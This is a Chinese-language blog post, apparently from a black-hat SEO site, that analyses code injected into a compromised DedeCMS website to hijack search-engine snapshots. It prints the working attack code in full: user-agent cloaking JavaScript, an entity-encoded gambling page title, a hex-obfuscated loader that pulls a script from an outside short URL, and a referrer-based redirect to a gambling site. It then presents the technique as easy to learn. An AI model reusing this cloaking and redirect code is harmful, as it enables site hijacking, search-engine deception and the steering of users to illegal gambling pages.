1. 首页
  2. 黑帽seo

百度快照劫持代码【实战分析】

百度快照劫持代码【实战分析】百度快照劫持大家应该都听过,但具体是怎么回事呢?今天给大家讲一下。
有个朋友的站,是用dedecms做的,不得不吐槽一下,DEDECMS果然是漏洞百出,然后被HACK插入了代码。今天我们来分析这几行代码,比较简单,也很容易学会。

百度快照劫持代码【实战分析】

【1】scriptif(navigator.userAgent.toLocaleLowerCase().indexOf(baidu) == -1){document.title = {dede:global.cfg_webname/}}/script
大家来看这段JS,JS里面包含一个判断,是根据什么判断呢,这是是根据userAgent来判断,如果不是百度来的,那就显示dedecms本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。
【2】title#22825#27941#26102#26102#24425#44#22825
#27941#26102#26102#24425#35268#21017#44#22825
#27941#26102#26102#24425#29609#27861#44#22825
#27941#26102#26102#24425#31283#36194#26041#26696
#45#24425#20048#22253/title
我们再来看这三行代码,这三行代码好像看不懂,不过他采用的是Unicode编码,解码以后,是天津,天津规则,天津玩法,天津稳赢方案-彩乐园这一行代码,搞懂了。
script type=text/javascript
window[\x64\x6f\x63\x75\x6d\x65\x6e\x74][\x77\x72\x69\x74\x65] (
\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a
\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x
72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x74\x2e\x63\x6e\x2f\x52\x6e\x
59\x30\x68\x4c\x6c\x22\x3e\x3c\x2
f\x73\x63\x72\x69\x70\x74\x3e)
/script
解密出来就是这段话:
script type = text/javascript window[document][write](script type=text/javascript src=http://t.cn/RnY0hLl/script) /script
意思是向首页中插入这行代码
那为什么还是会跳转呢?就是这行代码的事,这个转代码其实是向原网页插入一JS JS原地址 :
http://seo268.su.bcebos.com/cly.js
而JS的内容是如下内容:
document.writeln(script LANGUAGE=\Javascript\)
document.writeln(var s=document.referrer)
document.writeln(if(s.indexOf(\baidu\)0 s.indexOf(\sogou\)0 s.indexOf(\soso\)0 s.indexOf(\
sm\)0 s.indexOf(\uc\)0 s.indexOf(\bing\)0 s.indexOf(\yahoo\)0 s.indexOf(\so\)0 s.indexOf(\google\)0))
document.writeln(location.href=\http://t.cn/RnYpcMt\)
document.writeln(/script)
document.writeln()
document.writeln();
明白的人就懂了,说是百度快照 劫持,其实只要是搜索引擎来的都会劫持。跳转到另一个短网址,而短网址解密出来:http://www.caileyuan.cc
就是这个BC网站,这些黑客真是煞费苦心。
今天的课程就分享完了,其实学习黑帽SEO并不难,主要是方法正确,认真研究,都可以做得不错。

END
原创文章,作者:moss,如若转载,请注明出处:https://www.heoseo.com/hmseo/19638.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

联系我们

在线咨询:

邮件:986522615@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息